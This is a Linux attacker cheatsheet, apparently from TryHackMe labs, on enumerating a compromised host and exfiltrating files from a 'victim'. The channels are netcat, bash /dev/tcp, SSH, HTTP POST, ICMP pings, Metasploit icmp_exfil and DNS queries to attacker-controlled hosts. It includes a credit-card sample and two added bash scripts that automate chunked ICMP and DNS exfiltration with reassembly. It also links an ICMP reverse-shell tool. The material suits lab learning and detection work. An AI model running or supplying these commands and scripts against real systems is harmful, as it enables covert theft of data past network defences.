Linux cheatsheet
Enum
OS
uname -a
cat /etc/os-release
users
who
whoami
last
w
network
netstat
sudo netstat -atupn
ss (iproute2 replacement for netstat; takes the same -atupn style flags)
processes
Note: pspy64 (https://github.com/DominicBreuker/pspy) watches other users' processes and cron jobs without root
ps aux
Data transfer
Netcat style
Note: -q 1 (quit one second after EOF on stdin) is a traditional/Debian netcat flag; OpenBSD nc uses -N for the same thing
On our machine
nc -l -p 1234 -q 1 > something.zip < /dev/null
On victim
cat something.zip | netcat server.ip.here 1234
Tcp (bash /dev/tcp redirection, no netcat needed on the victim)
Note: dd conv=ebcdic only re-maps the bytes so the base64 is not recognisable on the wire; it is not encryption. conv=ascii reverses it on our side.
Send
On our machine
nc -lvp 8080 > /tmp/task4-creds.data
On victim
tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080
Extract
dd conv=ascii if=/tmp/task4-creds.data | base64 -d > task4-creds.tar
tar xvf task4-creds.tar
SSH
Note: needs an SSH server listening on our machine (the jump host) that the victim can reach and authenticate to
On victim
tar cf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
Http(s)
Example php web server (writes the raw POST field "file" to /tmp/http.bs64)
<?php
if (isset($_POST['file'])) {
$file = fopen("/tmp/http.bs64","w");
fwrite($file, $_POST['file']);
fclose($file);
}
?>
Send file
curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php
Parse file
## Fix base64: curl --data sends the body as-is, but the server decodes it as application/x-www-form-urlencoded, where '+' means space, so every '+' in the base64 arrives as a space. Sending with curl's --data-urlencode option instead avoids the problem.
sudo sed -i 's/ /+/g' /tmp/http.bs64
## Extract
cat /tmp/http.bs64 | base64 -d | tar xzvf -
Tunneling
https://github.com/L-codes/Neo-reGeorg
ICMP
Traditional (ping -p pattern)
Note: -p takes at most 16 bytes (32 hex digits) per packet, and ping repeats the pattern to fill the payload, so anything longer has to be split over several pings
Convert our data to hex
echo "thm:tryhackme" | xxd -p
Send via ping
ping 10.10.237.11 -c 1 -p 74686d3a7472796861636b6d650a
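Added example (not from the original cheatsheet): the ping -p trick generalised to data longer than 16 bytes. It hex-encodes stdin, cuts it into 16-byte chunks, and can rejoin the captured chunks; the sending function is the live side and is not exercised by the demo. Assumes bash and GNU coreutils (od, fold, sed), and the target address 10.10.237.11 from the page.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheatsheet: ping -p carries at most
# 16 pattern bytes (32 hex digits) per packet, so anything longer than the
# page's "thm:tryhackme" string must be split over several echo requests.
# Assumptions: bash and GNU coreutils (od, fold, sed); target address
# 10.10.237.11 as on the page.
set -euo pipefail

# icmp_chunks: hex-encode stdin (like xxd -p, but od is on every box) and
# print one chunk of at most 16 bytes (32 hex digits) per line.
icmp_chunks() {
  printf '%s\n' "$(od -An -v -tx1 | tr -d ' \n')" | fold -w 32
}

# icmp_send HOST: one echo request per chunk, in order. Live side; not run
# by the demo below. The receiver sees each pattern repeated to fill the
# payload and must keep only the first 16 bytes per packet (fewer for the last).
icmp_send() {
  local chunk
  while IFS= read -r chunk; do
    ping -c 1 -p "$chunk" "$1" >/dev/null
  done
}

# icmp_join: turn the captured hex chunks (stdin, in order) back into bytes.
icmp_join() {
  printf '%b' "$(tr -d '\n' | sed 's/../\\x&/g')"
}

# icmp_demo STRING: constructed input, chunked and rejoined locally so the
# round trip can be checked without sending a packet.
icmp_demo() {
  printf '%s' "$1" | icmp_chunks | icmp_join
}

# Live use (victim side): printf 'admin:password' | icmp_chunks | icmp_send 10.10.237.11
```

On the receiving side tcpdump or scapy sees the hex bytes inside the ICMP payload after the 8-byte timestamp; feed them to icmp_join in the order the packets arrived.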
Via metasploit and nping
Setup listener (msfconsole on our machine):
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src <IP>
Note: <IP> is our own address, so the module does not capture its own echo replies
Send data (from the victim; the packet starting with BOF, the module's START_TRIGGER, names the output file, the packets after it are the contents, and EOF, the END_TRIGGER, closes it):
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "BOFfile.txt"
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "admin:password"
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "admin2:password2"
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "EOF"
Reverse shell
https://github.com/krabelize/icmpdoor
DNS
Note: you need to own a domain and point its NS records at your server, so every lookup under it ends up at you. The queries arrive from the victim's resolver (or its upstream), not from the victim's own IP.
Setup listener
sudo tcpdump -i eth0 udp port 53 -v
Send file (base64, split into 18-char labels, 8 labels per name; a DNS label holds at most 63 characters and a whole name 253, so bigger files need several queries)
cat task9/credit.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/att.tunnel.com/ | awk '{print "dig +short " $1}' | bash
Parse file (keep the first 8 labels, drop the dots, decode)
echo TmFtZTogVEhNLXVzZX.IKQWRkcmVzczogMTIz.NCBJbnRlcm5ldCwgVE.hNCkNyZWRpdCBDYXJk.OiAxMjM0LTEyMzQtMT.IzNC0xMjM0CkV4cGly.ZTogMDUvMDUvMjAyMg.pDb2RlOiAxMzM3Cg== | cut -d"." -f1-8 | tr -d "." |base64 -d
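Added example (not from the original cheatsheet): the page's one-liner packs the whole file into a single query name, which only works while the base64 fits in eight labels. This version goes further: it emits as many queries as needed, keeps every label under the 63-character and every name under the 253-character RFC 1035 limits, prefixes each query with a sequence label so an out-of-order or duplicated capture still decodes, and uses the URL-safe base64 alphabet so '+' and '/' never appear in a hostname. The decoder accepts bare names or raw tcpdump lines. Assumes bash and GNU coreutils, dig on the victim, and the attacker zone att.tunnel.com from the page; the sample record is constructed.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheatsheet: multi-query DNS exfil
# with sequence numbers and RFC 1035 length checks. Assumptions: bash and
# GNU coreutils; the attacker-controlled zone is att.tunnel.com, as on the page.
set -euo pipefail

DOMAIN="att.tunnel.com"
LABEL=18     # characters per label, as on the page (max 63)
LABELS=8     # labels per query: 8*18 + 7 dots + "<seq>." + ".att.tunnel.com" stays far below 253

# dns_encode FILE: print one query name per line, e.g.
#   0.TmFtZTogVEhNLXVzZX.IKQWRkcmVzczogMTIz.[...].att.tunnel.com
dns_encode() {
  local n=0 chunk name
  printf '%s\n' "$(base64 "$1" | tr -d '\n' | tr '+/' '-_')" \
    | fold -w $((LABEL * LABELS)) \
    | while IFS= read -r chunk; do
        name="$n.$(printf '%s\n' "$chunk" | fold -w "$LABEL" | paste -sd. -).$DOMAIN"
        [ "${#name}" -le 253 ] || { echo "query name too long: ${#name}" >&2; return 1; }
        printf '%s\n' "$name"
        n=$((n + 1))
      done
}

# dns_send FILE: resolve every name through the victim's resolver (live side;
# not run by the demo). The answer is irrelevant, the query itself is the leak.
dns_send() {
  local q
  dns_encode "$1" | while IFS= read -r q; do dig +short "$q" >/dev/null 2>&1 || true; done
}

# dns_decode: read captured names on stdin (bare names or raw tcpdump lines,
# any order, duplicates allowed), order by the sequence label, strip it and
# the domain, and decode.
dns_decode() {
  grep -o "[^ ]*\.$DOMAIN" \
    | sort -t. -k1,1n -u \
    | cut -d. -f2- \
    | sed "s/\.$DOMAIN\$//" \
    | tr -d '.\n' \
    | tr '_-' '/+' \
    | base64 -d
}

# dns_sample_text: constructed sample data (not real), two records long so
# the encoder has to emit more than one query.
dns_sample_text() {
  printf 'Name: THM-user\nAddress: 1234 Internet, THM\nCredit Card: 1234-1234-1234-1234\nExpire: 05/05/2022\nCode: 1337\n'
  printf 'Name: THM-user2\nAddress: 5678 Internet, THM\nCredit Card: 5678-5678-5678-5678\nExpire: 06/06/2023\nCode: 7331\n'
}

# dns_roundtrip_demo: encode the sample, mangle the "capture" (duplicate the
# first query, reverse the order, wrap each line in tcpdump-style text), decode.
dns_roundtrip_demo() {
  local tmp
  tmp=$(mktemp)
  dns_sample_text > "$tmp"
  dns_encode "$tmp" > "$tmp.q"
  { cat "$tmp.q"; head -n1 "$tmp.q"; } \
    | sed '1!G;h;$!d' \
    | sed 's/^/10.10.10.5.41234 > 10.10.10.1.53: 1337+ A? /; s/$/. (80)/' \
    | dns_decode
  rm -f "$tmp" "$tmp.q"
}

# Live use: dns_send task9/credit.txt on the victim, then on our NS host:
#   sudo tcpdump -i eth0 -l -n udp port 53 | tee capture.log
#   dns_decode < capture.log > credit.txt
```

Keep the sequence label: recursive resolvers retry and reorder, so without it the tcpdump order is not a safe reassembly order.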